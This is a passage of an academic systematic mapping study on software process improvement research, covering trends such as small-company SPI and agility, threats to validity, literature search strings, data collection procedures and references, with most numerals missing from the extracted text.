small-to- medium-sized enterprises (sme). figure provides an overview of the share of papers explicitly addressing spi in smes (and other company sizes if mentioned in title, keywords, or abstracts). the figure shows a first ‘‘peak’’ from - (matching the ‘‘dot-com’’ phase), and then a growing interest starting again in continuing till now. in total out of papers explicitly mentioned the company size in the context attributes of which papers ( . %) mention smes (or vses), and another papers ( . %) mention other company sizes; one paper addresses companies regardless of their size. cross-cutting the company size, the metadata also contains an attribute for global software engineering (gse), i.e., if spi takes place in a global setting. a total of papers address gse-related questions. in kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the classification of publications addressing spi in small and very small companies, and spi in other company sizes (n = ). the following, we provide some insights regarding the topics spi for smes addresses and we also provide an overview of the respective application domains and covered life cycle phases. figure provides a systematic map of the papers that explicitly mention the company context. the figure shows the classification according to the research- and contribution type facet. regarding the research type facet, fig. shows a fairly balanced picture, i.e., we find solution proposals, philosophical papers, evaluation research, and experience papers. regarding the contribution type facet, papers mostly provide frameworks and lessons learned. however, for vses and smes, three papers develop models on spi for smes, two papers develop theories on spi for smes, and nine papers also address tools in the context of spi for smes. the get more insights, we filtered the metadata for the company size. the results are illustrated in tables – . table shows that most of the vse/sme-related papers emerge from the domain of web, mobile, and cloud-based software development. companies categorized as ‘‘other,’’ i.e., large companies and global players, mostly contribute to the body of knowledge from embedded systems and telecommunication. regarding the respective publication objectives, table , again, shows the trend to contribute custom/new spi models—especially for the vse/sme context (cf. ‘new and customized spi models’), and to collect success factors (cf. ‘spi success factors’). table also shows the interest into agile and lean approaches in the context of spi. as already mentioned in ‘new and customized spi models’, a certain trend shows a particular focus on improving project- and quality management. table reflects this trend also for the company-size context, whereas large companies and global players seemingly address a broader spectrum of life cycle phases. summary. among the papers from the result set, explicitly mention the company size as context attribute. in total, papers explicitly mention small and very small companies as research context. almost half of the papers ( papers) address custom/new spi models, which confirms the previously observed trend. in the present result set, we kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table overview of spi application domains. application domain v/sme other embedded system telecommunication medical devices automotive mission-critical defense business is web/mobile/cloud skills and education table overview of publication objectives. publication objective v/sme other agile/lean process simulation process line/patterns product line/management success factors custom model general improvement table overview of addressed life cycle phases. life cycle phase v/sme other project management quality management requirements engineering architecture implementation test find a growing interest in spi for sme, which is also supported by the recently published standard iso/iec that explicitly addresses spi for small and very small companies (six papers already refer to this new standard). spi and agility finally, fig. visualizes the fourth trend found in the initial study: although perceived as contradiction, in recent years, combining agility and spi received some attention, such as agile maturity models. in total, the result set contains papers ( . %) that address agility in the context of spi, and the fig. shows first contributions on this topic just around the agile manifesto’s publication. however, the ‘‘real’’ interest started around , similar to salo & abrahamsson ( ), when the number of studies dealing with agility and spi started to increase. figure shows the big picture by visualizing the research- and contribution type facets of the papers on agility and spi. the figure shows a balanced research, i.e., the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure trend chart of the share of papers that investigate the application of agility in spi. figure overview of the classification of publications addressing agility and spi (n = ). result set contains solution proposals as well as evaluation research and experience reports, and philosophical papers discussing agility and spi (only two of the philosophical papers are secondary studies). the majority of the papers contributes lessons learned (from applying agile in spi or related activities) and frameworks. analyzing the papers for the collected metadata, papers discuss agility in the context of the standard spi models, i.e., cmmi and iso/iec . furthermore, papers propose custom spi models of which six papers ground their proposal in cmmi and three papers in iso/iec . papers discuss success factors associated with agility and spi, whereas only one paper develops a model on success factors while of the remaining papers report lessons learned only. regarding the company size, nine papers explicitly mention vses and smes as research context and seven papers address other company sizes (mostly in the embedded systems and telecommunication application domain). furthermore, five papers discuss agility in a global software engineering context (three of them in the context large companies). finally, regarding the covered life cycle phases, six papers aim to improve the project management and nine papers address quality management and software test. summary. among the papers from the result set, deal with agility and spi. these papers address a variety of topics showing agility considered relevant for many aspects of software and system development thus becoming interesting for spi, too. the majority of the classified papers deals with agility as concept to improve processes. however, the result set also contains papers adapting agility for spi as such, like agile maturity models kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (e.g., schweigert et al., ) or concepts to justify agility and standard spi models. the result set also shows that agility is not for v/smes only, but also large companies and even global players have a growing interest into agility. discussion in this section, we discuss the findings obtained so far. beyond the discussion of the trends already identified in our initial study, we also broaden our perspective and discuss further trends that can be found in the updated result set. further insights in spi research. beyond the aforementioned major trends, the updated study (including the updated data analysis procedures) reveals more insights but few further trends. at first, the study confirms the statement by horvat, rozman & györkös ( ) that spi is important for all companies regardless of their size, and, we can add, also regardless of their application domain. rationale for this growing interest can be found in new technologies and markets (see also attribute gse in fig. ), and in the evolution of software development methods. for instance, several studies like the ‘‘state of agile survey’’ (versionone, – ) show a growing interest in agile and lean approaches and, at the same time, vijayasarathy & butler ( ) and theocharis et al. ( ) study how this trend is manifested in the companies’ process use. especially theocharis et al. ( ) mention hybrid software processes (or the ‘‘water-scrum-fall’’ as named by west, ) as standard approach. yet, so far, little is known about the (systematic) development of such hybrid processes. this can be considered one reason for the growing interest in spi: companies want/have to adopt agile/lean approaches (e.g., diebold et al., ), but they also have to comply with external norms and standards (e.g., in the domain of safety-critical systems), which we consider a main driver behind spi initiatives. another perspective is given by vses and smes that also have a growing interest in spi. however, for companies of this size, standard approaches, such as cmmi or iso/iec are often inappropriate (see for instance staples et al., ). at this scale, agile/lean is important as well as context-specific spi approaches, which can be considered an explanation for the significant number of custom/new spi models (‘new and customized spi models’) such as lappi (raninen et al., ) or tailored standards, such as iso/iec (laporte & o’connor, ). another finding of the study is a strong focus on project management and quality management (often together with testing) in spi. spi is, usually, a management-driven endeavor. as argued in theocharis et al. ( ), managers want to have their ‘‘safe’’ and measurable environment, while developers prefer slim and agile development approaches (see also murphy et al. ( ); tripp & armstrong ( )). this line of argumentation provides rationale for two observations from this study: first, there is a continuous effort in studying measurement in general and, second, the growing interest in agile/lean approaches. both together lead to a number of the aforementioned hybrid software processes and also to context-specific spi approaches that—all together—provide an explanation for the strong focus on project- and (general) quality management. regarding the remaining life cycle phases, requirements engineering and software test are the most frequently researched topics in spi. however, the high number of testing-related papers (compared to the implementation-related papers) motivates the question for why this rather ‘‘late’’ kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. phase is more emphasized, especially in times of agile/lean software development. is testing addressing implementation as well? is testing subject to improvement because of the effort spent on this activity? however, these are questions that cannot be answered in the current stage of the study thus remain subject to future work (see also ‘conclusion & future work’). what is the state of spi after all? our data shows a diverse picture and, furthermore, shows spi a frequently researched topic (fig. ). moreover, research on spi addresses a variety of aspects with certain focus points: the majority of the investigated publications focuses on proposing custom/new frameworks and on reporting lessons learned. furthermore, our results show a significant imbalance between proposing new solutions and evaluating their feasibility—especially in the long run. the majority of evaluation research is conducted in the context of standardized spi- and maturity models (fig. ). for newly proposed models, we often find—if at all—only single-case validation (in industry or university-hosted labs); only few, e.g., raninen et al. ( ) provide a comprehensive evaluation. another finding is the lack of theorizing approaches, which are often performed for specific domains (e.g., smes) or grounded in secondary studies only. in summary, although spi is around for decades, we still miss a sound theory about spi. we have a number of standardized and specific spi models and frameworks. however, we still lack evidence. one reason could be that spi always involves change in behavior of individual persons and changes in the culture of an organization. due to the varying contexts, spi cannot be too descriptive. therefore, frameworks and tools are proposed for adaptation to the respective context. this would also provide an explanation for the effort spent to study spi success factors (‘spi success factors’), which can be considered an early step towards crafting a more general and context-agnostic theory on spi. yet, the constant change or evolution of the context could be considered a continuous stimulus to provide new frameworks that only have a short life cycle and are quickly replaced by other frameworks that aim to ‘‘better’’ solve a particular issue. this assumption is supported by the missing long-term and replication studies (the result set only contains explicitly mentioned replication studies). yet, this constant change could also put all attempts to standardize spi at stake. as for instance vijayasarathy & butler ( ) and theocharis et al. ( ) have shown, companies utilize highly customized and specific processes, and the aforementioned diversity could end up in a situation in which every organization implements its own ‘‘home-grown’’ spi approach, leaving only non-binding initiatives, such as the spi manifest (pries-heje & johansen, ) as least common denominator. furthermore, missing is a critical discussion and comparison of available approaches, and their use and feasibility in practice. although we found secondary studies, these studies lay their focus on investigating success factors rather than providing structure and trying to generalize available knowledge, as for instance done by unterkalmsteiner et al. ( ). however, in our study, we found more than papers addressing standard spi approaches, papers presenting/discussing custom/new models, and we also found papers explicitly devoted to spi success factors. all together, these papers provide a rich ground to conduct research on the evolution of spi models, which would help studying the actual essence of spi models, factors that positively/negatively influence the success of kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spi programs. in a nutshell, our results show that spi is a still emerging field characterized by solution proposals and experiences awaiting more effort to systematization. threats to validity in this section, we evaluate our findings and critically review our study regarding its threats to validity. as a literature study, this study suffers from potential incompleteness of the search results and a general publication bias, i.e., positive results are more likely published than failed attempts. for instance, the result set does not contain studies that explicitly report on failure and draw their conclusions from respective lessons learned, and we thus cannot analyze proposals to answer the question for: what works and what does not? that is, our study encounters the risk to draw an incomplete and potentially too positive picture. internal validity. beyond the aforementioned more general threat, the internal validity of the study could be biased by personal ratings of the participating researchers. to address this risk, we continued our study kuhrmann et al. ( ), which follows a proven procedure kuhrmann, fernández & tiessler ( ) that utilizes different supporting tools and researcher triangulation to support dataset cleaning, study selection, and classification. furthermore, due to the inappropriateness of the focus type facet as classification schema in this stage of the study (as already discussed in kuhrmann et al., ), we addressed this threat to validity by relying on a new, more flexible set of metadata (‘analysis and classification’). this new instrument addresses the previously found issues, namely (general) disagreement on the categorization, and lacking precision and demand for multiple assignments respectively. however, although the issues with the focus type facet were solved, the metadata schema introduces potentially new threats. for instance, due to the nature of the study, we cannot ensure to have a full set of metadata for every paper (as already mentioned in ‘rq : result set contribution’, only % of the papers have attributes from all three metadata dimensions assigned and, still, we cannot ensure to have captured all metadata). furthermore, the metadata collected so far needs to be considered initial, as there are potentially more attributes of interest. that is, since we rely on the mapping study instrument in the first place, some metadata might yet not be captured, as this would require a more in-depth analysis, e.g., using the systematic review instrument. furthermore, as we introduced metadata attributes, the risk of misclassification increases, e.g., due to misunderstandings regarding the criteria to be applied or due to confusing/misleading use of terminology in respective papers. external validity. the external validity is threatened by missing knowledge about the generalizability of the results. however, as we focused on a broadband analysis accepting a large number of publications, we assume to have created a generalizable result set. furthermore, due to an extra quality assurance and trend analysis of the two result sets (initial study and study update) and the integrated result set, in ‘result overview’, we could observe a manifesting trend (see figs. – ). yet, this assumption needs to be confirmed by further independently conducted studies. also, the external validity can be threatened by the modified data collection procedure (appendix ‘data collection in the study update’), which includes a potential limitation of the update chunks to be added. however, the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aforementioned quality assurance and trend analysis procedures did not show a significant impact on the trends of the distribution of the papers in the result sets. nevertheless, to increase the external validity, further update and/or replication studies are required to confirm our findings. with the study at hand, we lay the foundation for such research by providing an actionable update procedure (appendix ‘search and cleaning procedure’) that can be implemented by further researchers. furthermore, as already mentioned in the discussion on the internal validity, generalizability is also affected by potential white spots in the metadata attributes, which, however, requires further investigation. such (independently conducted) investigation will (i) contribute to the internal validity by increasing dataset completeness, but (ii) will also improve the external validity by incrementally improving the quality of the dataset used to draw general conclusions. conclusion & future work in this article, we presented a substantially updated systematic mapping study on the general state of the art in software process improvement (spi). the present work continues our long-term study of which we published initial results in kuhrmann et al. ( ), and (i) evolves the dataset and the precision of the data analysis and (ii) introduces an improved data collection instrument to serve further studies of the field. to analyze the data obtained from automatic searches, we rely on the research type facet by wieringa et al. ( ) and the contribution type facet by shaw ( ) as standard classification schemas. furthermore, to get deeper insights, we defined metadata attributes. in total, our study results in papers that allow for a long-term analysis of the development of spi, and that allow for determining research hot-spots and (general) trends. in particular and based on kuhrmann et al. ( ), our study investigates previously observed trends: a constant publication rate of custom/new spi models, a huge interest into studying spi success factors, and an increasing interest in studying spi in the context of (very) small enterprises and in adopting agile principles and practices to spi. among other things, papers ( %) of the papers propose/discuss custom or new spi approaches (ranging from fully-fledged models to specific fine-grained methods). from these papers, ground their contribution in standard models, such as cmmi or iso/iec , whereas the majority of the papers is based other practices or none of the available approaches. the majority of the custom/new models covers self-contained spi approaches, which are, however, scarcely evaluated in a broader context (the most frequently used instrument to conduct spi research is the single-case study). moreover, the publication pool is focused on solution proposals, yet lacking theories or models of spi. regarding the second trend, papers ( . %) were identified contributing spi success factors. the investigation of how the success factors were distilled showed an increasing trend towards secondary studies. that is, although most of the contributing papers report on rather short-term studies or studies carried out in a university lab (only papers mention a mixed-method or long-term research approach to investigate and evaluate success factors), there is an observable trend to foster information collection and structuring. the third trend kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is the increasing interest into spi in the context of vses and smes. in the result set, papers ( . %) explicitly address companies of this size of which about the half ( papers) addresses custom/new spi approaches tailored to this particular context. yet, the result set also shows new standards that address this context (e.g., the iso/iec ) represented in the study. the last trend studied addresses agility and spi. the result set mentions papers ( . %) mostly using agility as a concept to improve established processes, but the result set also lists agile maturity models or further concepts to justify agility and standard spi models. the result set also shows that agility is not for vses/smes only, but also large companies and even global players, e.g., from the domain of telecommunications, show a growing interest into agility. finally, going beyond the aforementioned general trends, inspecting the result set shows spi mostly addressing project management and quality management (including measurement), and the result set shows the growing interest into agile/lean approaches. impact. summarizing, our study provides a big picture illustrating the development of the field spi over more than years. our results show a diverse picture, which is shaped by a constant publication rate of about spi solution proposals per annum, and a large share of papers reporting lessons learned. however, our study also shows an imbalance in the publication pool: there are many solution proposals but few are rigorously evaluated. furthermore, although spi as a field addresses a variety of topics, on the one hand, our study shows several research hotspots but, on the other hand, we could also identify ‘‘under-researched’’ topics, such as sound theories and models on spi. therefore, our study has some impact on research as well as on practice. from the practitioner perspective, by using the categorized data, our study helps practitioners better characterize an actual/planned spi endeavor and to find proper approaches and experiences straight forward and thus helps avoiding errors already made before or re-inventing the wheel. for researchers, our study provides rich ground to conduct further research, e.g., by highlighting the white spots that need further investigation or by naming those fields that already accumulated a certain amount of data thus enabling researchers to conduct replication research. limitations. although being a long-term endeavor aggregating much knowledge, our study has some limitations. in particular, due to the overall goal of creating the big picture, our study suffers from the mapping study instrument applied. as a mapping study, our study suffers from missing details and, therefore (as discussed in the threats to validity), bears the risk of incomplete or even incorrect data classification. however, to overcome this major limitation, further (independently conducted) research is required to incrementally improve the data. furthermore, the present study is conducted from the perspective of ‘‘pure’’ spi. that is, (very) specific spi approaches in specific domains might not be triggered by the study design. to overcome this limitation, again, further complementing research is required to improve the data quality. future work. addressing the aforementioned limitations of the present study, future work comprises a collection of fine-grained studies for selected aspects. in particular, the study presented here serves as a scoping study to identify certain hotspots, trends, or streams kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. worth further investigation. based on those hotspots, we form data subsets, which we analyze using the systematic review instrument (instead of the mapping study instrument) to conduct in-depth analyses. currently, we called in further external researchers to strengthen the team and to carry out the following in-depth studies on spi in the field of global software engineering (gse; kuhrmann et al., in press), spi in the context of software quality management and testing, agility and spi, and spi barriers and success factors. conducting these studies helps rounding out the big picture and, moreover, to get more details and insights on specific topics of interest. furthermore, by applying the systematic review instrument, we directly address the aforementioned limitation and incrementally improve the data quality. in further iterations of the main study, such improved data is going to be integrated with the main study thus aiding the general improvement of the data and analyses presented here. as the present study is also designed to serve as a continuous measurement of spi’s heartbeat, the next update of the mapping study (including all detailed data obtained by then) is planned for . acknowledgements conducting such a study is a long-term endeavor that so far involved many people. we thank michaela tießler, ragna steenweg, daniel méndez fernández for their support in the early stages of this study, in particular in testing the instruments for paper selection and dataset cleaning. furthermore, we owe special thanks to the students of the ‘‘hiwi-pool’’ of the technische universität münchen, who supported us during the initial data collection and dataset completion and cleaning processes, and we also owe special thanks to claudia konopka and peter nellemann, who substantially supported the initial data analysis and reporting. furthermore, we thank the reviewers and participants of the international conference on software and systems process (icssp) for their valuable comments and the inspiring discussion on the initial study results. appendix a. initial study population in the initial study, based on the data collection procedures (described in appendix ‘data collection in the initial study’) and the study selection procedures (described in ‘research design’), we obtained the result set described in table . this dataset is the foundation for kuhrmann et al. ( ), and this result set also lays the foundation for the study update presented in this paper. appendix b. data collection procedures the presented study lays the foundation for a continuous study of the research field of software process improvement (spi). in order to support this long-term study, an efficient study update procedure is an imperative, which mainly affects the data collection procedures. therefore, in this appendix, we give an integrated and detailed view on the data collection procedure as executed in the initial study, and we detail the update procedure used for compiling the report at hand. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data collection and filtering results (tentative result sets during selection and final result set). step ieee acm springer elsevier wiley iet total step : search (‘query construction’) s and (c orc ) , , s and (c or c ) , , s and (c or c ) , , , , , , s and (c or c ) , , s and (c or c ) , , , , , , s and (c or c ) , , , , s and (c or c ) , s and c , , , step : removing duplicates (‘analysis preparation’) duplicates per database , , , , , , duplicates across all databases , , , step : in-depth filtering (‘filter queries’) applying filters f and f – – , unfiltered – , – – – , result set (search process) , , step : voting (‘analysis preparation’) final result set data collection in the initial study the initial study, inter alia, aimed at creating the baseline to study spi. therefore, the initial study was carried out with a considerable ‘‘manpower’’ that, however, is too costly for a continuous update. in this section, with the purpose of increasing transparency and reproducibility, we present the details of the initial data collection procedure (see also kuhrmann et al., ), before presenting the implemented—and recommended— approach to conduct the study updates in appendix ‘data collection in the study update’. query construction in a series of workshops, we defined the keywords that we are interested in and defined the general search strings in table , which were then validated in several test runs before being used in an automated full-text search in several literature databases. the queries were built based on keyword lists given by the common terminology in the area of software processes and spi. general queries. the general search strings s –s were defined according to the relevant topics in spi, e.g., improvement, assessment, measurement, iso/iec , cmmi, quality management, and so forth. due to the expected large number of results, we decided to complement the general search strings with context selectors c and c to limit the search to the domain of interest. finally, we concluded the search strings shown in table . filter queries. because of the full-text search, we expected a variety of publications including some overhead. hence, we defined two filter queries f and f to be applied to the initial result set with the purpose of reducing the result set to the key publications. query kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table search strings used for the database search in the initial study kuhrmann et al. ( ). search string addresses... s (life-cycle or lifecycle or life cycle) and (management or administration or development or description or authoring or deployment) process management: general life cycle s (life-cycle or lifecycle or life cycle) and (design or modeling or modelling or analysis or training) phases of the software process’s life cycle s modeling or modelling or model-based or approach or variant process modeling s optimization or optimisation or customization or customisation or tailoring process customization and tailoring s (measurement or evaluation or approach or variant or improvement) general measurement and improvement s reference model or quality management or evaluation or assessment or audit or cmmi or capability maturity model integration reference models and quality management s scampi or standard cmmi appraisal method for process improvement or spice or iso/iec or psp or personal software process or tsp or team software process reference models and assessment approaches s (feasibility or experience) and (study or report) reported knowledge and empirical research c software process and (software development model or process model) context definition: software processes c spi or software process improvement context definition: spi f (spi or software process improvement) and (approach or practice or management) spi approaches, practices, and spi management f (spi or software process improvement) and report and (feasibility or experience) evaluation research on spi, e.g., studies, reports, etc. f aims at finding all publications in the result set that explicitly present spi approaches and practices, or that address the management of spi. f aims at finding all reports in the context of spi in which feasibility is analyzed or experiences are reported. while the initial search was a full-text search, the filter queries were applied to the abstracts only. however, for technical reasons, acm and springer abstracts were partially not available in the initial result set and, thus, the filtering was done manually during the voting procedure (cf. appendix ‘analysis preparation’). data sources and data format the initial data collection was an automated full-text search in several literature databases. as main data sources, we relied on established literature databases, which we consider most appropriate for a search. in particular, we selected the following databases: acm digital library, springerlink, ieee digital library (xplore), wiley, elsevier (science direct), and iet software. if there was a paper listed in one of those databases, but was only referred, we counted it for the database that generated the item, regardless of the actual publication location. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we used the word clouds to visually inspect the result set for ‘‘intruders,’’ e.g., medicine, chemistry, and cancer therapy. terms not matching our search criteria were collected and used to identify and remove the misselected papers from the result set. please note: as our initial study resulted in a comprehensive microsoft excel spreadsheet, we also tailor the search and cleaning procedures to this tool. if you utilize a different tool, changes in the procedure might be necessary. analysis preparation we performed an automated search that required us to filter and prepare the result set. the data analysis is prepared by harmonizing the data and performing a -staged voting process. harmonization. due to the query construction, we found a vast amount of multiple occurrences in the result set, and we also found a number of publications that are not in software engineering or computer science. to make the selection of the contributions more efficient, we first cleaned the initial result set (cf. table for the results per phase). in the first step, we removed the duplicates, which we identified by title, year, and author list. in the second step, we applied the filter queries to sort out those publications not devoted to software processes and spi. to double-check the result set, we used word clouds generated from abstracts and keyword lists to validate if the result set meets our requirements. this procedure was performed individually per database and again on the integrated result set. finally, we completed missing data to prepare the voting procedure. voting the papers. the final selection whether or not a paper was included in the result set was made using a multi-staged voting procedure. this procedure was also applied in the study update and, therefore, is described in detail in ‘analysis preparation’. data collection in the study update in this section, we present the details about the recommended data collection procedure to be implemented for study updates. search queries the major update in the search procedure is the search engine utilized for the search. instead of repeating the search with individual databases (cf. appendix ‘data sources and data format’), we switched to scopus, as scopus as meta-search engine covers most of the relevant software engineering venues (journals as well as conferences). this however changes the general search procedure, notably the search strings need to be updated accordingly. the adapted search strings are summarized in table . comparing the new search queries to the initial study’s queries from table , it becomes obvious that the context selectors and filter queries are now integrated with the search strings. we tested the new search queries several times on subsets of the initial study before executed them to carry out the actual data collection. search and cleaning procedure changing the search engine also affects the cleaning procedures thus requiring an updated cleaning and filtering approach. to apply the new search strings to a scopus search, to clean the data, and to initiate the study selection, the following procedure needs to be applied: . insert the search strings s –s separately and use the time-range, i.e., conduct individual searches for the required time slot of the update. . set the automatic exclusion in scopus using exclusion criterion ec (table ) to: ‘‘subject areas’’ = computer science, engineering or multiple . set the automatic exclusion in scopus using exclusion criterion ec (table ) to: ‘‘language’’ = only english kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table final search strings used for the automatic database search in the study update procedure. search string s ((life-cycle or lifecycle or ‘‘life cycle’’) and (management or administration or development or description or authoring or deployment)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (modeling or modelling or model-based or approach or variant) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (optimization or optimisation or customization or customisation or tailoring) and ((‘‘software process’’ and (‘‘software de- velopment model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (‘‘reference model’’ or ‘‘quality management’’ or evaluation or (assessment or audit) or (cmmi or ‘‘capability maturity model integration’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘soft- ware process improvement’’)) s ((feasibility or experience) and (study or report)) and (spi or ‘‘software process improvement’’) s ((life-cycle or lifecycle or ‘‘life cycle’’) and (design or modeling or modelling or analysis or training)) and ((‘‘software pro- cess’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (measurement or evaluation or approach or variant or improvement) and ((‘‘software process’’ and (‘‘software develop- ment model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s ((scampi or ‘‘standard cmmi appraisal method for process improvement’’) or (spice or ‘‘iso/iec ’’) or (psp or ‘‘personal software process’’) or (tsp or ‘‘team software process’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) . export all search results into one microsoft excel file. . eliminate duplicates (ec , table ) applying the duplicate elimination function in microsoft excel to the paper title (double-check and confirm by also checking authors and abstract). . conduct the study selection procedures based on the inclusion and exclusion criteria listed in table following the procedure description in ‘analysis procedures’. additional information and declarations funding philipp diebold’s activities in this study were partially conducted in a software campus project funded by the german ministry of education and research (bmbf is ). marco kuhrmann and jürgen münch received no funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: german ministry of education and research: bmbf is . competing interests the authors declare there are no competing interests. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • marco kuhrmann and philipp diebold conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables. • jürgen münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references allison i. . organizational factors shaping software process improvement in small- medium sized software teams: a multi-case analysis. in: international conference on the quality of information and communications technology. piscataway: ieee, – . baddoo n, hall t. . de-motivators for software process improvement: an analysis of practitioners’ views. journal of systems and software ( ): – doi . /s - ( ) - . bayona-oré s, calvo-manzano j, cuevas g, san-feliu t. . critical success factors taxonomy for software process deployment. software quality journal ( ): – doi . /s - - -y. brodman jg, johnson dl. . what small businesses and small organizations say about the cmm. in: international conference on software engineering. piscataway: ieee, – . coleman g, o’connor r. . investigating software process in practice: a grounded theory perspective. journal of systems and software ( ): – doi . /j.jss. . . . diebold p, ostberg j-p, wagner s, zendler u. . what do practitioners vary in using scrum? in: international conference xp. berlin heidelberg: springer, – . dybå t. . an instrument for measuring the key factors of success in software process improvement. empirical software engineering ( ): – doi . /a: . el-emam k, goldenson dr. . an empirical review of software process assessments. advances in computers : – doi . /s - ( ) -x. hall t, rainer a, baddoo n. . implementing software process improvement: an empirical study. software process: improvement and practice ( ): – doi . /spip. . kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /spip. http://dx.doi.org/ . /spip. http://dx.doi.org/ . /peerj-cs. hannay je, benestad hc. . perceived productivity threats in large agile development projects. in: proceedings of the international symposium on empirical software engineering and measurement. new york: acm, : – : . helgesson yyl, höst m, weyns k. . a review of methods for evaluation of maturity models for process improvement. journal of software: evolution and process ( ): – doi . /smr. . horvat rv, rozman i, györkös j. . managing the complexity of spi in small compa- nies. software process: improvement and practice ( ): – doi . /(sici) - ( ) : < ::aid-spip > . .co; - . hull m, taylor p, hanna j, millar r. . software development processes—an assess- ment. information and software technology ( ): – doi . /s - ( ) - . humphrey ws. . managing the software process. boston: addison-wesley. kitchenham b, charters s. . guidelines for performing systematic literature reviews in software engineering. technical report ebse- - . keele university. korhonen k. . evaluating the impact of an agile transformation: a longitudinal case study in a distributed context. software quality journal ( ): – doi . /s - - - . kuhrmann m, diebold p, münch j, tell p. how does software process improvement address global software engineering? in: international conference on global software engineering, icgse. piscataway: ieee (in press). kuhrmann m, fernández dm, tiessler m. . a mapping study on the feasibility of method engineering. journal of software: evolution and process ( ): – doi . /smr. . kuhrmann m, konopka c, nellemann p, diebold p, münch j. . software process improvement: where is the evidence? in: proceedings of the international conference of software and system process, icssp. new york: acm, – . laporte c, o’connor r. . systems and software engineering standards for very small entities: implementation and initial results. in: proceedings of the international conference on the quality of information and communications technology, quatic. piscataway: ieee, – . monteiro lfs, de oliveira km. . defining a catalog of indicators to support process performance analysis. journal of software maintenance and evolution: research and practice ( ): – doi . /smr. . murphy b, bird c, zimmermann t, williams l, nagappan n, begel a. . have agile techniques been the silver bullet for software development at microsoft. in: international symposium on empirical software engineering and measurement. new york, piscataway: acm/ieee. müller sd, mathiassen l, balshøj hh. . software process improvement as orga- nizational change: a metaphorical analysis of the literature. journal of systems and software ( ): – doi . /j.jss. . . . münch j, armbrust o, kowalczyk m, sotó m. . software process definition and management. berlin heidelberg: springer. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /smr. http://dx.doi.org/ . /(sici) - ( ) : < ::aid-spip > . .co; - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smr. http://dx.doi.org/ . /smr. http://dx.doi.org/ . /smr. http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj-cs. paulish d, carleton a. . case studies of software-process-improvement measure- ment. ieee computer ( ): – . petersen k, feldt r, mujtaba s, mattson m. . systematic mapping studies in software engineering. in: international conference on evaluation & assessment in software engineering. new york: acm, – . pino fj, alegría jah, garcía f, piattini m. . a process for driving process im- provement in vses. in: international conference on software process. lecture notes in computer science, vol. . berlin heidelberg: springer, – . pino f, garcía f, piattini m. . software process improvement in small and medium software enterprises: a systematic review. software quality journal ( ): – doi . /s - - -z. pries-heje j, johansen j. . spi manifesto. available at http://www.iscn.com/images/ spi_manifesto_a. . . .pdf . rainer a, hall t. . an analysis of some ‘core studies’ of software process improve- ment. software process: imprmnt and practice ( ): – doi . /spip. . raninen a, ahonen jj, sihvonen h-m, savolainen p, beecham s. . lappi: a light-weight technique to practical process modeling and improvement target identification. journal of software: evolution and process ( ): – doi . /smr. . rozman i, vajde horvat r, gyórkós j, hericùko m. . processus—integration of sei cmm and iso quality models. software quality journal ( ): – doi . /a: . salo o, abrahamsson p. . an iterative improvement process for agile software development. software process: improvement and practice ( ): – doi . /spip. . schweigert t, vohwinkel d, korsaa m, nevalainen r, biro m. . agile maturity model: a synopsis as a first step to synthesis. in: proceedings of european conference on systems, software and services process improvement 